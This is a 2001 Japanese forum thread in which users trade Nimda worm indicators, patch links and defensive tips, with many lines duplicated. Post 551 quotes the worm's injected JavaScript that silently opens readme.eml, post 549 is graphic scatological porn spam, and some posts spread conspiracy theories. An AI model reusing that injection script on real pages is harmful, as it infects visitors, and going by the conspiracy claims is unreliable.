あたりまえか^^
518 : :01/09/20 01:15 ID:DJRijbDo
>516
こんなん昔っから愉快犯ですよ
こんなん昔っから愉快犯ですよ
519 :んなもん:01/09/20 01:15 ID:NxhSd01A
ネットスケープの会社にきまっとろうが!!
あとアップルも協力
あとアップルも協力
520 :困ってる人:01/09/20 01:16 ID:v3./JepU
521 : :01/09/20 01:16 ID:7VGVTehA
以下はトレンドマイクロのコピペだ
ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します:
^^^^^^^^^^^^^^
・c:\Windows\tmp\mep????.tmp
(「?」は任意の半角英数字 例:mep1234.tmp)
・c:\ADMIN.DLL
この2つのファイルはワームが添付されたメールファイルです。
・c:\Windows\tmp\mep????.tmp.exe
(「?」は任意の半角英数字 例:mep1234.tmp)
このファイルはワーム本体のプログラムファイルです。
いいか?わかると思うが、これが見つかったら、活動をはじめているって事だぜ!
とあるから、手動で検索するやつは、↑も検索シレ。
ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します:
^^^^^^^^^^^^^^
・c:\Windows\tmp\mep????.tmp
(「?」は任意の半角英数字 例:mep1234.tmp)
・c:\ADMIN.DLL
この2つのファイルはワームが添付されたメールファイルです。
・c:\Windows\tmp\mep????.tmp.exe
(「?」は任意の半角英数字 例:mep1234.tmp)
このファイルはワーム本体のプログラムファイルです。
いいか?わかると思うが、これが見つかったら、活動をはじめているって事だぜ!
とあるから、手動で検索するやつは、↑も検索シレ。
522 :ななし:01/09/20 01:16 ID:uMVG829M
523 : :01/09/20 01:17 ID:.Cmi970o
524 : :01/09/20 01:17 ID:WvtMKUq6
ネスケマンセー!IEユーザーざまぁみろ
525 : :01/09/20 01:17 ID:TCeIoCAo
IE5.xだろ?
ウチ4.xだから安心してるよ(w
ウチ4.xだから安心してるよ(w
仕事が増えるから今日はみんな優しいね。
527 : :01/09/20 01:19 ID:3RjHGm5M
今、対策を経た上でわざと感染URLを踏んで見たのですが、
readme.emlではなく、readme.mhtなるファイルが生成されました。
なにやらNimdaが変質した?という可能性もあるかも。要注意です。
readme.emlではなく、readme.mhtなるファイルが生成されました。
なにやらNimdaが変質した?という可能性もあるかも。要注意です。
528 :ななし:01/09/20 01:19 ID:uMVG829M
ブラウザのキャッシュフォルダに、eml 形式の file が
結構入っていたりする(した)。
***.eml の前の方は、"readme" ではなかったりする。
ということで、 "*.eml" で検索をかけてみて調べた方が
よいと思う今日このごろ。
結構入っていたりする(した)。
***.eml の前の方は、"readme" ではなかったりする。
ということで、 "*.eml" で検索をかけてみて調べた方が
よいと思う今日このごろ。
529 :困ってる人:01/09/20 01:23 ID:v3./JepU
お騒がせしました。
感染してなかったようです。
更新バージョン、0
が気になるのでバッチ探しに出ます。
ありがとうございました。
感染してなかったようです。
更新バージョン、0
が気になるのでバッチ探しに出ます。
ありがとうございました。
530 : :01/09/20 01:24 ID:4IrYJeVg
ウィルスって実はシマンテックが作ってるんじゃねえの?(w
対応早すぎ!
対応早すぎ!
531 : :01/09/20 01:25 ID:ANgufORo
IE4.0なら感染しないの?
532 : :01/09/20 01:26 ID:DJRijbDo
>531
知らないから試して
知らないから試して
533 : :01/09/20 01:26 ID:yboVjrtE
>>525
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
テストしたバージョン :
マイクロソフトは Internet Explorer 5.01 および 5.5 のテストを行い、
この脆弱性による影響を評価しました。
それ以前のバージョンに関してはサポートしておらず、
この脆弱性による影響は不明です。
MSがサポートしてないだけじゃ
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
テストしたバージョン :
マイクロソフトは Internet Explorer 5.01 および 5.5 のテストを行い、
この脆弱性による影響を評価しました。
それ以前のバージョンに関してはサポートしておらず、
この脆弱性による影響は不明です。
MSがサポートしてないだけじゃ
535 : :01/09/20 01:31 ID:mxveKdQg
>>527
mhtはメール形式でHTMLを保存するときの拡張子ね……
(Webアーカイブ、単一のファイルってやつ)
ふと思ったんだけど、
「InternetExplorer入れてるけどOutlook(Express)は入れてない」
↓
「*.emlを開くアプリケーションがない(関連づけられてない)」
そんなケースにもやっぱりreadme.eml作るのかな。
当該ケースの人いたら報告きぼん。
mhtはメール形式でHTMLを保存するときの拡張子ね……
(Webアーカイブ、単一のファイルってやつ)
ふと思ったんだけど、
「InternetExplorer入れてるけどOutlook(Express)は入れてない」
↓
「*.emlを開くアプリケーションがない(関連づけられてない)」
そんなケースにもやっぱりreadme.eml作るのかな。
当該ケースの人いたら報告きぼん。
536 : :01/09/20 01:37 ID:WvtMKUq6
マイクロソフトは笑えた!
NIMDAの被害件数カウントしてたのってオレだけ?
…ってやつ、もう誰か作った?
NIMDAの被害件数カウントしてたのってオレだけ?
…ってやつ、もう誰か作った?
537 :あ :01/09/20 01:44 ID:bQb0/D5M
>ワクチンメーカーがわざわざウイルスを作る必要はどこにも無し。
儲かるじゃん。株も上がるし。
儲かるじゃん。株も上がるし。
538 : :01/09/20 01:46 ID:H.FOaltM
539 : :01/09/20 01:48 ID:mxveKdQg
まあ現実のウィルスも研究所で作ってたりするわけだからなあ。
ワクチンの作り方を同時に研究しつつ、ってのは効率よいかも知れない。
売名行為としてはリスク大きすぎるけど。
ワクチンの作り方を同時に研究しつつ、ってのは効率よいかも知れない。
売名行為としてはリスク大きすぎるけど。
540 :名無しさん:01/09/20 01:49 ID:exRoYckg
まぁ、ワクチンメーカーも軍需産業みたいなもんで、
あんまり平和になり過ぎると変な事し始めるかもね。
あんまり平和になり過ぎると変な事し始めるかもね。
541 :あ:01/09/20 01:51 ID:bQb0/D5M
>でも、ほっといても作るやついるじゃん。わざわざ手を汚さなくても。
だから「ほっといても作るやついるじゃん」
がワクチンメーカー?って話です。
だから「ほっといても作るやついるじゃん」
がワクチンメーカー?って話です。
542 : :01/09/20 01:53 ID:H.FOaltM
543 :トムクルーズ(ばか):01/09/20 01:53 ID:vVUA01qs
ぼ、ぼくがゆるさない!!い?
544 :うふふ:01/09/20 01:53 ID:HCHDKoFg
ドリキャスってウイルスにも感染しないしブラクラもへっちゃら、
Q2に勝手に繋がったりもしないんだよ〜、凄いでしょ!!
Q2に勝手に繋がったりもしないんだよ〜、凄いでしょ!!
545 :あ:01/09/20 01:56 ID:bQb0/D5M
>542
ウィルスなんで誰が作ったかわかる?ばれにくいもんでしょ?
とくに、頭いいやつは上手くやるよ、きっと。
ウィルスなんで誰が作ったかわかる?ばれにくいもんでしょ?
とくに、頭いいやつは上手くやるよ、きっと。
546 : :01/09/20 02:00 ID:H.FOaltM
547 : :01/09/20 02:38 ID:83LDMJWU
ウイルスメーカーに勤めているやつの喜びは
「ものすごい手間隙かけて誰かが作ったウイルスを
即座に役立たずにすること」らしいよ
「ものすごい手間隙かけて誰かが作ったウイルスを
即座に役立たずにすること」らしいよ
548 : :01/09/20 02:46 ID:Cq8cKYS2
549 :元レスあぼーんしてね:01/09/20 02:53 ID:Sdac3J0I
開始草々、いきなり息詰まるう●こ脱糞の長丁場で快調にスタート。まっ赤なぺディキュアのいかす
オンナがすっきり排尿する姿は一服の清涼剤か。さてここから中盤・ラストにかけてが信じられない
シーンのオンパレード!まずは白濁のオリモノらしき粘液を延々便器にたらし続けるオンナ、続い
てお約束の経血排泄シーンから、更にバックからより鮮明にオリモノを垂らす様もゲット!圧巻は
なんと血みどろのタ●ポン引き抜き映像のドアップで決まりだ!出そうでいて引っ込むう●こに四苦
八苦の末あきらめてしまうオンナの姿で、この凄絶な作品は終わる。
オンナがすっきり排尿する姿は一服の清涼剤か。さてここから中盤・ラストにかけてが信じられない
シーンのオンパレード!まずは白濁のオリモノらしき粘液を延々便器にたらし続けるオンナ、続い
てお約束の経血排泄シーンから、更にバックからより鮮明にオリモノを垂らす様もゲット!圧巻は
なんと血みどろのタ●ポン引き抜き映像のドアップで決まりだ!出そうでいて引っ込むう●こに四苦
八苦の末あきらめてしまうオンナの姿で、この凄絶な作品は終わる。
550 :名無し:01/09/20 02:58 ID:.XAAgTPs
551 : :01/09/20 03:00 ID:oDKH.Uyw
ttp://www.auvelcraft.co.jp/whats_new/index.html
2重に追加されてるし...
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
2重に追加されてるし...
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
552 :マックって:01/09/20 03:01 ID:ZCR441vk
相手にしてもらえないみたいね
553 :PC初級:01/09/20 03:04 ID:TO4a6krw
IE5.0だと今回のウィルスは大丈夫なんでしょうかね?
554 : :01/09/20 03:05 ID:TcggdAj2
>ウイルスは「W32/Nimda」と呼ばれ、逆から読むと「政府、行政」「第3次世界大戦」と読めることから、
今回のテログループが仕掛けた”波状攻撃”の可能性が高いとみて、連邦捜査局(FBI)も捜査を開始した。
どうして「W32」=「第3次世界大戦」になるの?
今回のテログループが仕掛けた”波状攻撃”の可能性が高いとみて、連邦捜査局(FBI)も捜査を開始した。
どうして「W32」=「第3次世界大戦」になるの?
555 : :01/09/20 03:06 ID:tGKbrn0c
マックってPC人口の何%ぐらいなのかね?10%ぐらい??
556 : :01/09/20 03:06 ID:H.FOaltM
557 :甜菜:01/09/20 03:10 ID:tmw8ExCs
>>554
ウイルス名を逆に読むと、
「Admin(政府)」が「2(to)」「3W(第三次世界大戦)」
となることから、一部には「同時多発テロ事件と関連している」との見方がある。
同長官は「現時点では関連するという証拠はない」と否定した。
[毎日新聞9月19日]
ウイルス名を逆に読むと、
「Admin(政府)」が「2(to)」「3W(第三次世界大戦)」
となることから、一部には「同時多発テロ事件と関連している」との見方がある。
同長官は「現時点では関連するという証拠はない」と否定した。
[毎日新聞9月19日]
558 : :01/09/20 03:11 ID:17exxtiA
559 : :01/09/20 03:12 ID:JKE2kbzA
560 : :01/09/20 03:12 ID:7WVdG5co
6.0をいれますが止める人はいますか?
561 :554:01/09/20 03:12 ID:TcggdAj2
562 : :01/09/20 03:13 ID:.XAAgTPs
563 : :01/09/20 03:13 ID:UlebE322
564 :基地外でもなかったら:01/09/20 03:14 ID:ZCR441vk
6.0はやめとけ
565 : :01/09/20 03:14 ID:7WVdG5co
やはりやめます
566 :謝罪さん@賠償いっぱい<ヽ`∀´><謝罪しる!:01/09/20 03:15 ID:kzjFTNWY
W32.<ヽ`д´><Nida.A@mm (html)
567 : :01/09/20 03:16 ID:SQ3SwXPE
いつもW32って名前の前に付いてる気がしたが?
W32ってどういう意味?Windows32bit?
W32ってどういう意味?Windows32bit?
568 : :01/09/20 03:17 ID:tmw8ExCs
569 : :01/09/20 03:18 ID:.XAAgTPs
570 : :01/09/20 03:22 ID:oDKH.Uyw
571 : :01/09/20 03:22 ID:HXIInXgA
572 : ◆GpSwX8mo :01/09/20 03:23 ID:Agx9xXP6
おまえらのなかにホントにウィルスに感染なんかしたやついんの?
573 : :01/09/20 03:24 ID:SQ3SwXPE
>>569
違う違う。本当の意味だって。
有名なウイルスにはW32って全部始めについてたはず。
てか、なんでもかんでもテロ&戦争にむすびつけるなよっていいたい。
そんなに戦争起こしたいのかおまえらって感じで。
戦争がおこっても普通の人にいいことは一つも無い。
利益があるのは特殊な奴らだけなんだから。
違う違う。本当の意味だって。
有名なウイルスにはW32って全部始めについてたはず。
てか、なんでもかんでもテロ&戦争にむすびつけるなよっていいたい。
そんなに戦争起こしたいのかおまえらって感じで。
戦争がおこっても普通の人にいいことは一つも無い。
利益があるのは特殊な奴らだけなんだから。
574 : :01/09/20 03:28 ID:oDKH.Uyw
>>573
>違う違う。本当の意味だって。
W32付いてない→16bitモード動作→Win2Kはダイジョーブ
W32付いてる →32bitモード動作→Win2Kでもヤバーイ
W64付いてる →64bitモード動作→Win3Kでもヤバーイ
>違う違う。本当の意味だって。
W32付いてない→16bitモード動作→Win2Kはダイジョーブ
W32付いてる →32bitモード動作→Win2Kでもヤバーイ
W64付いてる →64bitモード動作→Win3Kでもヤバーイ
575 :1の606:01/09/20 03:28 ID:IBewjk7Q
ノートンの体験版インストールしてスキャンしました。
感染ファイルは4つでどれもNimdaをダウンロードさせるJavaScriptを含むhtmファイルでした。
どうやら完全に感染したわけじゃないみたいなのでよかったです。
早速IE6.0をインストールしたいと思います。
ノートン先生マンセー
感染ファイルは4つでどれもNimdaをダウンロードさせるJavaScriptを含むhtmファイルでした。
どうやら完全に感染したわけじゃないみたいなのでよかったです。
早速IE6.0をインストールしたいと思います。
ノートン先生マンセー
576 :ななーし:01/09/20 03:29 ID:4LgQL/ms
577 : :01/09/20 03:31 ID:SQ3SwXPE
578 :576:01/09/20 03:33 ID:4LgQL/ms
579 : :01/09/20 03:34 ID:bFfoCRZI
http://search.fresheye.com/?kw=readme.eml&term=monthly
では、汚染された70件になってる。
対策してない人は、覗くのは良いけど、リンクしていったらダメよ。
では、汚染された70件になってる。
対策してない人は、覗くのは良いけど、リンクしていったらダメよ。
581 : :01/09/20 03:38 ID:SQ3SwXPE
582 :んちゃ:01/09/20 03:40 ID:B/qlJEWI
対策完了 つかれたよう
583 : :01/09/20 03:41 ID:1DW6kGfk
CドライブがC$とか言う名前で共有化されてたら
感染してると聞いたが、思いっきりなっちゃってるよ。
検索ではそれらしいものはHITしなかったんだがなー。
やばいすかね?
感染してると聞いたが、思いっきりなっちゃってるよ。
検索ではそれらしいものはHITしなかったんだがなー。
やばいすかね?
584 :んちゃ:01/09/20 03:44 ID:B/qlJEWI
Cに共有がかかってると、いろんなフォルダにコピーがおかれるというだけ。
共有していれば、コピーされている可能性があるよ。実行しなければ問題ないが、
IISがインストールされていたり、IEのセキュリティが弱ければhtmlをみただけで、
即感染という可能性もあるはず。
共有していれば、コピーされている可能性があるよ。実行しなければ問題ないが、
IISがインストールされていたり、IEのセキュリティが弱ければhtmlをみただけで、
即感染という可能性もあるはず。
585 :んちゃ:01/09/20 03:48 ID:B/qlJEWI
あ、$がついていると他からは見えないはずだから大丈夫かもしれんね
586 : :01/09/20 03:52 ID:tmw8ExCs
今回の感染者からメールが来たら
添付が憑いてるんだよね?
って事は、トロイみたくナナシメールじゃなく
相手が感染者かどうかわかるって事?
添付が憑いてるんだよね?
って事は、トロイみたくナナシメールじゃなく
相手が感染者かどうかわかるって事?
587 : :01/09/20 03:52 ID:1DW6kGfk
588 :名無しさん:01/09/20 03:55 ID:AmLquBTE
589 : :01/09/20 03:59 ID:JOHD9kU2
590 : :01/09/20 04:02 ID:JOHD9kU2
■■■■■■ 結論 ■■■■■■
Outlook(Express)は使うな
厨房は世間に迷惑を掛けるな
591 : :01/09/20 04:04 ID:qVhZzt96
592 : :01/09/20 04:09 ID:HwYVz6kY
593 :にゃごにゃご ◆SiztG/RU :01/09/20 04:10 ID:RaDALfHY
きのうは、いろんな会社のシステム管理者は泣いていたらしい。
会社のサーバーが何時間もストップ。ウィルス警告を出してた
管理者の人たち、大変でした。がんばってください。
会社のサーバーが何時間もストップ。ウィルス警告を出してた
管理者の人たち、大変でした。がんばってください。
595 : :01/09/20 04:12 ID:zSerKTw2
今回のウィルスはIISを使ってるサーバにとっては
本当に最悪・・・
対応している感触だとIISのまだ知られていないセキュリティ
ホールを使用しているような感じを受ける。
IISのパッチと感染ファイル削除でウィルスを100%防ぎきれてないよ・・・・
本当に最悪・・・
対応している感触だとIISのまだ知られていないセキュリティ
ホールを使用しているような感じを受ける。
IISのパッチと感染ファイル削除でウィルスを100%防ぎきれてないよ・・・・
596 : :01/09/20 04:13 ID:H.FOaltM
メールってじぶんで送った相手に送られるの?
勝手にアドレス張にあるのに大量に送るんじゃないの?
勝手にアドレス張にあるのに大量に送るんじゃないの?
597 : :01/09/20 04:25 ID:JKE2kbzA
MSが申し訳けない程度に出していた謝罪(と呼べるのか)を
もうリンクを外しました。
MSN.co.jp トップページみてみれ。
ないから。
腐れ会社め。
もうリンクを外しました。
MSN.co.jp トップページみてみれ。
ないから。
腐れ会社め。
598 :ななーし:01/09/20 04:30 ID:4LgQL/ms
599 : :01/09/20 04:32 ID:vDXhK5/E
outlookEXPじゃなくてNetscapeMessengerなら大丈夫?
600 :600?:01/09/20 05:03 ID:siP9LIcI
このウィルス名、
2chでは「MSNウィルス」に決まり?
・・・また、訴えられたりして(w
2chでは「MSNウィルス」に決まり?
・・・また、訴えられたりして(w
601 : :01/09/20 06:41 ID:jEiDNDZs
602 : :01/09/20 06:43 ID:yzpIcRZ2
IISサーバー管理者で、Nimdaに感染しなかった人いる?
本当に最新パッチを当ててたら感染しないの?
感染してないって話し1件も聞いてないけど・・・
本当に最新パッチを当ててたら感染しないの?
感染してないって話し1件も聞いてないけど・・・
603 : :01/09/20 06:45 ID:RtNwlScE
MSNウイルス決定。
604 : :01/09/20 06:49 ID:yzpIcRZ2
605 : :01/09/20 06:50 ID:RtNwlScE
606 : :01/09/20 06:51 ID:RtNwlScE
607 :ななしさそ:01/09/20 06:52 ID:dPTVCb0g
Cドライブがネットワーク共有されているかどうかって
どうすれば確認出来るのですか?
どうか教えてください。
どうすれば確認出来るのですか?
どうか教えてください。
608 : :01/09/20 06:56 ID:pVgfGRkc
609 : :01/09/20 06:56 ID:UD5071ks
610 : :01/09/20 06:58 ID:yzpIcRZ2
611 : 607:01/09/20 06:58 ID:RtNwlScE
612 : :01/09/20 07:06 ID:yzpIcRZ2
誰か
IISサーバーへのNimdaからの攻撃の防御は
どのセキュリティパッチで防げるかの情報をまとめて欲しい。
MS01-026
http://www.asia.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-026
でいいのかな?
IISサーバーへのNimdaからの攻撃の防御は
どのセキュリティパッチで防げるかの情報をまとめて欲しい。
MS01-026
http://www.asia.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-026
でいいのかな?
613 : :01/09/20 07:11 ID:OWEEiCkE
IT不振を解消する為に
セキュリティ開発会社が
自社製品だけは大丈夫なものを配布したんだろうな。
セキュリティ開発会社が
自社製品だけは大丈夫なものを配布したんだろうな。
614 : :01/09/20 07:14 ID:RtNwlScE
615 : :01/09/20 07:14 ID:OWEEiCkE
ちなみに先物取り引きで
テロによる原油、金の高騰狙いのテロ組織や
国が関係している疑いが強い。
テロによる原油、金の高騰狙いのテロ組織や
国が関係している疑いが強い。
616 : :01/09/20 07:19 ID:1f6GceTk
MSN行ってももう大丈夫かな?
617 : :01/09/20 07:21 ID:3cGUB40.
オレの通ってる学校で、nimda感染が確認されたよ。
対策なんてしてないから、LAN経由で広まっていくんだろうな。
鬱になってくるよ
対策なんてしてないから、LAN経由で広まっていくんだろうな。
鬱になってくるよ
618 : :01/09/20 07:24 ID:yzpIcRZ2
>>614
MSは
MS00-078は導入を強くお勧めします
ってなってるけど。
MS01-026に関してはそのようなことは書かれていない。
これだけの被害になる可能性があるのだったら、もっと警告をだすべきだったよね > MS。
まあ、MS自身が感染しちゃったんだから、弁解の余地無しか。
MSは
MS00-078は導入を強くお勧めします
ってなってるけど。
MS01-026に関してはそのようなことは書かれていない。
これだけの被害になる可能性があるのだったら、もっと警告をだすべきだったよね > MS。
まあ、MS自身が感染しちゃったんだから、弁解の余地無しか。
619 : :01/09/20 07:25 ID:6AoCFwaA
>>612
マカが言うには今回のに対するIISセキュリティパッチは
2001 年 8 月 15 日 IIS 用の累積的な修正プログラム (MS01-044)
だってよ。
Microsoft IIS 4.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=32066
PC/AT 互換機用 : ダウンロード先で、次のファイル名をクリックして、ファイルをダウンロードしてください。
Q301625i.exe - 1,087 Kb
Microsoft IIS 5.0:
PC/AT 互換機用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=32016
NEC PC-9800シリーズ用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=32017
脆弱性識別番号 :
URL リダイレクトのサービス拒否の脆弱性 : CAN-2001-0545
WebDAV のサービス拒否の脆弱性 : CAN-2001-0508
MIME ヘッダーのサービス拒否の脆弱性 CAN-2001-0544
SSI のアクセス権の昇格の脆弱性 : CAN-2001-0506
システム ファイル一覧のアクセス権の昇格の脆弱性 : CAN-2001-0507
…この脆弱さの数はある意味壮観だな(苦藁
マカが言うには今回のに対するIISセキュリティパッチは
2001 年 8 月 15 日 IIS 用の累積的な修正プログラム (MS01-044)
だってよ。
Microsoft IIS 4.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=32066
PC/AT 互換機用 : ダウンロード先で、次のファイル名をクリックして、ファイルをダウンロードしてください。
Q301625i.exe - 1,087 Kb
Microsoft IIS 5.0:
PC/AT 互換機用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=32016
NEC PC-9800シリーズ用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=32017
脆弱性識別番号 :
URL リダイレクトのサービス拒否の脆弱性 : CAN-2001-0545
WebDAV のサービス拒否の脆弱性 : CAN-2001-0508
MIME ヘッダーのサービス拒否の脆弱性 CAN-2001-0544
SSI のアクセス権の昇格の脆弱性 : CAN-2001-0506
システム ファイル一覧のアクセス権の昇格の脆弱性 : CAN-2001-0507
…この脆弱さの数はある意味壮観だな(苦藁
620 : :01/09/20 07:25 ID:wX11BoX6
readme.exeでファイルまたはフォルダ名で検索したら何もなかったけど
含まれる文字列でやると隠しファイルになっているUSER.DATというファイルが
出てきました。...ヤバイですか?
含まれる文字列でやると隠しファイルになっているUSER.DATというファイルが
出てきました。...ヤバイですか?
621 : :01/09/20 07:27 ID:H.FOaltM
履歴・・
ついでにマカが言うには、
> この他、"Web Server Folder Traversal"や、
>コンテント・タイプ・スプーフィング脆弱点も悪用されます。
だそうだ。
> この他、"Web Server Folder Traversal"や、
>コンテント・タイプ・スプーフィング脆弱点も悪用されます。
だそうだ。
624 : :01/09/20 07:30 ID:yzpIcRZ2
>>619
なるほど、それで感染数が多くなった理由がわかった。
MS01-044は今までのセキュリティパッチをまとめたものってなってるから、
今までのパッチを全てあててる管理者は見過ごしたんじゃないかな?
なるほど、それで感染数が多くなった理由がわかった。
MS01-044は今までのセキュリティパッチをまとめたものってなってるから、
今までのパッチを全てあててる管理者は見過ごしたんじゃないかな?
625 : :01/09/20 07:36 ID:yzpIcRZ2
>>619
しかしそういうのは、MSが真っ先に発表するべきじゃないのかな?
自社サーバーが感染してパニクってる状態だから、そんな余裕ないかな?
しかし、MSは認識が甘すぎるね。
マジで正式に謝罪すべきだよね。
しかしそういうのは、MSが真っ先に発表するべきじゃないのかな?
自社サーバーが感染してパニクってる状態だから、そんな余裕ないかな?
しかし、MSは認識が甘すぎるね。
マジで正式に謝罪すべきだよね。
626 : v:01/09/20 07:38 ID:RtNwlScE
628 : :01/09/20 07:40 ID:6AoCFwaA
ところで、この識別番号見てぜってぇ問題起こってからその部分に"だけ"
対応しているって思ったの俺だけ?
対応しているって思ったの俺だけ?
629 :はぁ:01/09/20 07:42 ID:kPp7QDR.
load.exeがうろうろしてるよー
どーすれば退治できるのだ???
どーすれば退治できるのだ???
630 : :01/09/20 07:47 ID:2EeU/L8M
さっき日テレの「ズームイン朝」でやってた説明が
ものすごく厨房なんだけど。
感染を防ぐためには
・メール添付ファイルは開かない
・ワクチンソフトを使う
今回の感染の仕方と違うだろボケ!
ものすごく厨房なんだけど。
感染を防ぐためには
・メール添付ファイルは開かない
・ワクチンソフトを使う
今回の感染の仕方と違うだろボケ!
631 :名無しさん:01/09/20 07:48 ID:H.zebSkM
で、ニムダってハングル語か?
632 :hu:01/09/20 07:49 ID:Clp8GAlM
>630
厨房なのはいつもだが、さすがに今回は笑えないな〜
厨房なのはいつもだが、さすがに今回は笑えないな〜
633 :腐れ会社め…:01/09/20 07:49 ID:aPQWmFdI
ていうか、家6への移行を促進する為のM$の自作自演だろ。(藁
634 : :01/09/20 07:51 ID:BRXE9.wQ
>631
それは俺も思った。
それは俺も思った。
http://search.fresheye.com/?kw=readme.eml&term=monthly
ヘルスのサイトも感染してる。
ヘルスのサイトも感染してる。
# やっと起きた(藁
>>602
うちはapache(Linux)と併用してサーバを上げてるが、IIS×2台とも全く問題なし。
ログにはアタックされた形跡は山ほど残ってるけど :-)
>>620
user.datはユーザ用のレジストリを収めたファイルです。
特に問題はないでしょう。
>>625
今回の件が落ち着いてから正式なルートを使って抗議すべきなのかな・・
>>630
ワシも見てました。それじゃ防げないって(^^;
まぁ、NHKを含めてまともな報道をしてたところは無かったですが。
# 某テレビ局内部ではすでに蔓延していて報道どころではないらしいが
>>631
超既出。"admin" を逆から読んで "nimda"。
>>633
IE6をダウンロードするだけじゃMSにとって何にも得にならないと思う。
むしろWindowsXPでしか防げないウイルスを開発すれ(藁
>>602
うちはapache(Linux)と併用してサーバを上げてるが、IIS×2台とも全く問題なし。
ログにはアタックされた形跡は山ほど残ってるけど :-)
>>620
user.datはユーザ用のレジストリを収めたファイルです。
特に問題はないでしょう。
>>625
今回の件が落ち着いてから正式なルートを使って抗議すべきなのかな・・
>>630
ワシも見てました。それじゃ防げないって(^^;
まぁ、NHKを含めてまともな報道をしてたところは無かったですが。
# 某テレビ局内部ではすでに蔓延していて報道どころではないらしいが
>>631
超既出。"admin" を逆から読んで "nimda"。
>>633
IE6をダウンロードするだけじゃMSにとって何にも得にならないと思う。
むしろWindowsXPでしか防げないウイルスを開発すれ(藁
637 : :01/09/20 08:06 ID:uiJmEgMQ
>>630
事態が分かってないのか、構成がDQNなのか、単に時間が取れなかったのか
正しくは
・IEを5以降のSP最新にする
・セキュリティレベルをカスタマイズするorDLを一切拒否する
・ウイルス監視ソフトを最新定義ファイルで使う
・outlook(ex)をあぼーん
・添付ファイルは開くどころかプレビューでも感染するので触れずに抹殺
・最後の武器さ対応ワクチン
・死なば諸共再セットアップ
だろうけど……スーパー初心者スレの例もあるし
視聴者に分かりやすく説明すると1時間もの位でないと
間に合わないかな?
事態が分かってないのか、構成がDQNなのか、単に時間が取れなかったのか
正しくは
・IEを5以降のSP最新にする
・セキュリティレベルをカスタマイズするorDLを一切拒否する
・ウイルス監視ソフトを最新定義ファイルで使う
・outlook(ex)をあぼーん
・添付ファイルは開くどころかプレビューでも感染するので触れずに抹殺
・最後の武器さ対応ワクチン
・死なば諸共再セットアップ
だろうけど……スーパー初心者スレの例もあるし
視聴者に分かりやすく説明すると1時間もの位でないと
間に合わないかな?
638 : :01/09/20 08:08 ID:BKoFXM0Y
IE6は勧めない方がいいですよ。
圧縮版(表示が速い)が表示されない。書き込み後、圧縮版の方へ飛ばされるから
その都度、非圧縮版へ戻らないといけないし、スレッド一覧も圧縮版の方にリンクされてる。
圧縮版(表示が速い)が表示されない。書き込み後、圧縮版の方へ飛ばされるから
その都度、非圧縮版へ戻らないといけないし、スレッド一覧も圧縮版の方にリンクされてる。
>>638
IE6ってVersion: 6.00.2600.0000?
某スレで公開されたのを知ってからずっと(先週末だったかな)使ってるけど、
特に問題ないみたいだけど。Win2000+SP2+IE6(+hotfix)環境ね。
# これもWin2000環境で書いてる。
IE6ってVersion: 6.00.2600.0000?
某スレで公開されたのを知ってからずっと(先週末だったかな)使ってるけど、
特に問題ないみたいだけど。Win2000+SP2+IE6(+hotfix)環境ね。
# これもWin2000環境で書いてる。
640 : :01/09/20 08:11 ID:1DkKZwAs
∧∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ゚Д゚) < IE6はAAが可愛く表示されないから使えない
| っ日 \__________
と_)_)
( ゚Д゚) < IE6はAAが可愛く表示されないから使えない
| っ日 \__________
と_)_)
641 : :01/09/20 08:16 ID:2EeU/L8M
642 : :01/09/20 08:17 ID:BKoFXM0Y
643 : :01/09/20 08:19 ID:2EeU/L8M
>640
以前と変わりありませんが、何か?
以前と変わりありませんが、何か?
645 :31アイスクリーム@人柱は自作板の華:01/09/20 08:49 ID:vu.Mmt9c
自動巡回ソフトやWEB先読み機能のついてる高速化ソフト使ってる場合も注意が必要。
汚染したHPへのリンクがあるHPにアクセスしたり、汚染されたサイトを不用意に検
索しただけで、先読み機能が汚染したHPを読み込んで感染するので、対策が出来てな
いうちは先読み機能を外したほうが良い。
(Let's人柱精神で試したら、案の定ノートンAVで警報が出た(藁))
汚染したHPへのリンクがあるHPにアクセスしたり、汚染されたサイトを不用意に検
索しただけで、先読み機能が汚染したHPを読み込んで感染するので、対策が出来てな
いうちは先読み機能を外したほうが良い。
(Let's人柱精神で試したら、案の定ノートンAVで警報が出た(藁))
646 :お願い:01/09/20 09:03 ID:f/pgGoKE
学生さんへお願いです。
学校のPCに感染させて遊ばないで下さい。
LAN経由で学内のPC全てがウイルス漬けになっちまいます。
学校のPCに感染させて遊ばないで下さい。
LAN経由で学内のPC全てがウイルス漬けになっちまいます。
ローカルファイルとして書き込まれてしまった readme.eml ファイルを触った
だけでも感染してしまいますが、これはJavaScriptとは無関係なわけです。
(「触っただけで」とは、フォルダのウィンドウ内でシングルクリックする
(つまりファイルを選択する)だけでという意味。このとき、Windowsは、
ファイルのプレビュー動作をするため、このときに起動してしまう。)
だけでも感染してしまいますが、これはJavaScriptとは無関係なわけです。
(「触っただけで」とは、フォルダのウィンドウ内でシングルクリックする
(つまりファイルを選択する)だけでという意味。このとき、Windowsは、
ファイルのプレビュー動作をするため、このときに起動してしまう。)
648 :新快速:01/09/20 09:07 ID:stkQVy4M
HP見るだけで感染とは・・・
これが「ひろちく」のHPに仕掛けてあったら・・・恐ろしい
これが「ひろちく」のHPに仕掛けてあったら・・・恐ろしい
649 : :01/09/20 09:11 ID:5iZIPLnY
マロの会社、弱小企業でPC3台くらいしかないんだけど、
だれも、この事件のこと、話題にしないんだよね。
ネットとかは、休み時間に見る人ばかりで、
そーいう方面、疎いのかな?
